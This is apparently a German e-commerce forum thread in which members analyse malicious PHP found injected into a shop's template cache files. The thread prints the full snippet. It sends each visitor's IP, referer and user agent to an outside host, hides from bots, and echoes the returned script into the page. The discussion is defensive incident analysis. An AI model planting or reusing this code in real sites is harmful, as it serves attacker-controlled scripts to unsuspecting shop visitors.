Sicherheitshinweis

[ShopNix]

Bei einem Neukunden fand ich folgenden Code in praktisch allen Templatecache Dateien:

Code: PHP  [Auswählen]

#66ccb1#
error_reporting(0); ini_set('display_errors',0); $wp_j6451 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_j6451) && !preg_match ('/bot/i', $wp_j6451))){
$wp_j096451="http://"."template"."body".".com/body"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_j6451);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_j096451);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_6451j = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_6451j,1,3) === 'scr' ){ echo $wp_6451j; }
#/66ccb1#

Die Fehlermeldung des Kunden war: Mein Shop ist viel zu langsam.

Tatsächlich hatte der Shop Ladezeiten von über 2 Minuten, vermutlich weil die Adresse nicht mehr erreichbar war.

Linkback: https://www.modified-shop.org/forum/index.php?topic=30150.0

[Tomcraft]

Der Teil #66ccb1# sieht mir aber sehr verdächtig nach einem infizierten Shop aus. Hier wurde vermutlich Code eingeschleust. Nur den Template-Cache zu löschen wird das Problem nicht auf Dauer beheben, siehe dazu auch: FAQ: Hilfe, ich glaube mein Shop wurde gehackt

Grüße

Torsten

[ShopNix]

Sorry, ich vergaß hinzuzufügen:

Der betroffene Shop wurde wohl vor einem halben Jahr gehackt und anschließend gesäubert. Hilfreich wäre natürlich, wenn man wüsste, was die Ursache war. Der Kunde weiß es nicht, weil sein Hoster seinerzeit mit im Spiel war.

Sachdienliche Hinweise werden natürlich immer gern genommen, den Hoster habe ich deshalb schon angeschrieben.

Übrigens sieht nicht nur der Teil #66ccb1# nach infiziert aus, sondern der gesamte Codeblock. Darum habe ich ihn gepostet.

[p3e]

Das ist mit Sicherheit Schadcode. Da wird IP Adressen, Referer und Useragent des Seitenbesuchers übermittelt und dann ein Code in die Seite eingefügt, der als cURL request zurückgeliefert wird. Das kann dann alles Mögliche sein aber sicherlich nichts harmloses.

NACHTRAG: Der Code wird nur dann angezeigt, wenn der zweite bis vierte Buchstabe "scr" sind:

Code: PHP  [Auswählen]

if ( substr($wp_6451j,1,3) === 'scr' ){ echo $wp_6451j; }

Damit soll sicherlich verhindert werden, dass eine Fehlermeldung oder sonstiges erscheint, wenn der schadcodesendende Server überlastet ist. Es soll also ein fremdes Script ausgeführt werden.

Noch ein Nachtrag  ... der Schadcode wird nur angefordert, wenn mit einem üblichen Browser auf die Seite zugegriffen wird. Damit will der Autor sicherlich verhindern, dass Google oder andere Bots den Schadcode erkennen und eventuell darauf hinweisen.
Fazit: er ist böse aber clever

[Tomcraft]

[...]
Übrigens sieht nicht nur der Teil #66ccb1# nach infiziert aus, sondern der gesamte Codeblock. Darum habe ich ihn gepostet.

Das meinte ich doch.

Das ist für den Bot der Erkenner, dass er die Datei schon erfolgreich infiziert hat.

Grüße

Torsten

[fishnet]

Den Code habe ich auch schonmal gesehen. Der Kommentar verändert sich allerdings von Datei zu Datei, damit du ihn nicht wiederfindest. Und die Variable wp_6451j ist bei jedem Shop eine andere.

Der Hacker hat gestern seinen Server abgeschaltet. Dadurch fliegen nun die ganzen verseuchten Shops auf.